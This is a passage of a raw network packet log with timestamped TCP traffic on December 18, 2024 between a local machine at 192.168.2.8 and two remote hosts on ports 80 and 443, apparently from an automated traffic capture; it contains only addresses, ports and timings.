                                                                                                                                                                                          Dec 18, 2024 09:07:17.944221973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.944281101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.944556952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.944605112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.952522993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.952574015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.952644110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.952691078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.960448980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.960545063 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.960568905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.960617065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.072392941 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.072455883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.072652102 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.080054998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.080107927 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.080303907 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.080410004 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.080476999 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:18.082720041 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:18.082758904 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.090512991 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:18.090568066 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.090658903 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:18.090931892 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:18.090956926 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.192363977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.192466021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.192513943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.192564011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.199724913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.199760914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.199776888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.199804068 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311702013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311774015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311825991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311908007 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311927080 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311944008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311955929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311980009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.311990976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312014103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312033892 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312050104 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312066078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312088013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312103033 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312123060 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312136889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312158108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312170982 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312210083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312211037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312263966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312266111 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312316895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312319040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312350988 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312361956 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312386036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312397003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312421083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312431097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312458992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312463045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312494040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312500000 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312530994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312535048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312566042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312573910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312599897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312608004 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312633991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312635899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.312678099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313069105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313105106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313112020 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313139915 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313263893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313302040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313319921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313352108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313368082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313380957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313385010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313419104 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313421965 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313433886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313457012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313469887 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313491106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313500881 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313527107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313539982 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.313570976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314079046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314129114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314131975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314167023 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314188004 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314203024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314202070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314248085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314369917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314405918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314415932 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314452887 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314507008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314553976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314599037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.314646006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.319295883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.319350958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.319427967 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.319581032 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.323839903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.323939085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.323950052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.323992014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.328524113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.328579903 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.328648090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.328695059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.333143950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.333195925 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.333197117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.333244085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.432389975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.432514906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.432574034 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.434546947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.434710026 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.434771061 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.439193010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.439347029 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.439404964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.443969965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.444166899 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.444225073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.447807074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.447859049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.447930098 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.451378107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.451436043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.451503992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.454469919 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.455168962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.455220938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.455223083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.457493067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.458620071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.458683968 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.458731890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.458781004 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.462362051 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.462418079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.462421894 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.463473082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.465821981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.465917110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.465923071 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.466459990 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.469371080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.469476938 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.469496012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.469537973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.472949028 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.473001957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.473010063 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.473046064 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.476391077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.476486921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.476557970 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.480145931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.480310917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.480360985 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.483696938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.483767986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.483772039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.483838081 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.487076044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.487178087 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.487212896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.487261057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.490609884 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.490726948 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.490778923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.494129896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.494265079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.494317055 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.497654915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.497737885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.497803926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.499456882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.501226902 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.501358032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.501404047 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.504762888 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.504884958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.504933119 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.508313894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.508407116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.508455992 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.511864901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.511995077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.512038946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.515413046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.515552044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.515605927 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.518975973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.519146919 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.519196033 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.522574902 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.522687912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.522738934 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.526010990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.526129961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.526186943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.529584885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.529882908 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.529958010 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.533112049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.533207893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.533262014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.536644936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.536761999 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.536812067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.540206909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.540338993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.540399075 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.543795109 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.543876886 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.543927908 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.547278881 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.547354937 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.547388077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.547444105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.550839901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.550909996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.551004887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.551155090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.554359913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.554481030 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.554506063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.554565907 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.558005095 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.558058977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.558115959 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.561482906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.561722994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.561794043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.565037966 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.565114975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.565179110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.568552017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.568638086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.568711996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.572062016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.572278976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.572346926 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.575664997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.575743914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.575812101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.580046892 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.580167055 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.580244064 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.582760096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.582973003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.583044052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.586302042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.586359978 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.586375952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.587466955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.589847088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.589905024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.589957952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.590012074 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.593620062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.593734980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.593915939 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.596905947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.596988916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.597043991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.600405931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.600519896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.600581884 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:18.603992939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:18.604059935 CET804971431.41.244.11192.168.2.8
